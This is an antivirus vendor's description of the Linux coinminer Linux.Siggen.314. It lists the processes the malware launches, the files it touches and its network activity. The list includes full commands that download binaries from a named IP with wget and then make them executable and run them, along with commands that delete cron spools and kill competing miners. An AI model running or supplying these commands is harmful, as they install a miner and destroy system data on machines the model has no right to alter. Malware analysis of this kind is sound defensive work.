Linux.Siggen.314

Added to the Dr.Web virus database: 2017-12-06

Virus description added:

Technical Information

Malicious functions:
Launches processes:
  • /bin/sh <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
  • <SAMPLE_FULL_PATH>
  • /bin/sh <SAMPLE_FULL_PATH> -c
  • ps auxf
  • grep -v 685
  • grep \-c
  • awk {print $2}
  • xargs kill -9
  • kill -9 100 680 689
  • head -1
  • ps auxw
  • sort -rn -k3
  • awk {if($3>40.0) print \"ps -ef|grep \" $2}
  • sh
  • grep -v grep
  • awk {print \"kill -9 \"$3}
  • awk {if($3>40.0) print \"kill -9 \" $2}
  • grep -w .sh
  • grep tmp
  • ps -ef
  • kill -9
  • grep -w tmp
  • grep -w /bin/sh
  • grep -w /bin/bash
  • kill -9 682
  • grep .so
  • cut -c 9-15
  • kill -9 3
  • grep -w .so
  • rm -Rrf /var/spool/cron/atjobs /var/spool/cron/atspool /var/spool/cron/crontabs
  • rm -Rrf /var/spool/cron/*
  • pkill -f stratum
  • pkill -f wget
  • pkill -f sleep
  • pkill -f irqba2anc1
  • pkill -f irqba5xnc1
  • pkill -f irqbnc1
  • pkill -f conns
  • pkill -f irqbalance
  • pkill -f crypto-pool
  • pkill -f minexmr
  • pkill -f XJnRj
  • pkill -f NXLAi
  • pkill -f BI5zj
  • pkill -f askdljlqw
  • pkill -f minerd
  • pkill -f minergate
  • pkill -f Guard.sh
  • pkill -f ysaydh
  • pkill -f bonns
  • pkill -f donns
  • pkill -f kxjd
  • pkill -f polkitd
  • pkill -f acpid
  • rm -rf /tmp/apaceha
  • head /dev/urandom
  • tr -dc a-z
  • head -c 6
  • head -c 7
  • head -c 5
  • grep jorqfb
  • wc -l
  • uname -a
  • grep x86_64
  • wget -O /root/jorqfb http://45.76.102.45/watchcat32
  • chmod +x /root/jorqfb
  • sleep 2
  • nohup /root/jorqfb
  • /root/jorqfb
  • /bin/bash /root/jorqfb -c exec '/root/jorqfb' \"$@\" /root/jorqfb
  • /bin/bash /root/jorqfb -c
  • grep -E wget|curl
  • grep -v 45.76.102.45
  • grep -v 795
  • rm -f /root/jorqfb
  • grep waiduqt
  • ps -fe
  • grep -v defunct
  • wget 45.76.102.45/minerd32 -O /root/waiduqt
  • chmod +x /root/waiduqt
  • wget -O /root/qjfon http://45.76.102.45/httpd1
  • sleep 5
  • nohup /root/waiduqt -c /root/qjfon
  • /root/waiduqt -c /root/qjfon
  • rm -rf /root/qjfon
  • rm -f /root/waiduqt
  • rm -f /tmp/apaceha
  • sleep 20
Kills the following processes:
  • ext4-rsv-conver
  • bash
  • /bin/grep
  • run.sh
  • ksoftirqd/0
  • acpid
Performs operations with the file system:
Modifies file access rights:
  • /root/jorqfb
  • /root/waiduqt
Creates or modifies files:
  • /root/.bashrc
  • /root/jorqfb
  • /root/waiduqt
  • /root/qjfon
Deletes files:
  • /root/.SEQ
  • /var/spool/cron/*
  • /tmp/apaceha
  • /root/jorqfb
  • /root/qjfon
  • /root/waiduqt
Network activity:
Establishes connection:
  • <LOCAL_DNS_SERVER>
HTTP GET requests:
  • 45.##.#02.45/watchcat32
  • 45.##.#02.45/minerd32
  • 45.##.102.45/httpd1
DNS ASK:
  • xm#.###l.minergate.com
Sends data to the following servers:
  • 13#.###.88.145:45560
Receives data from the following servers:
  • 13#.###.88.145:45560
Other:
  • Collects CPU information
  • Collects RAM information
  • Collects information about network activity

Curing recommendations

Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.
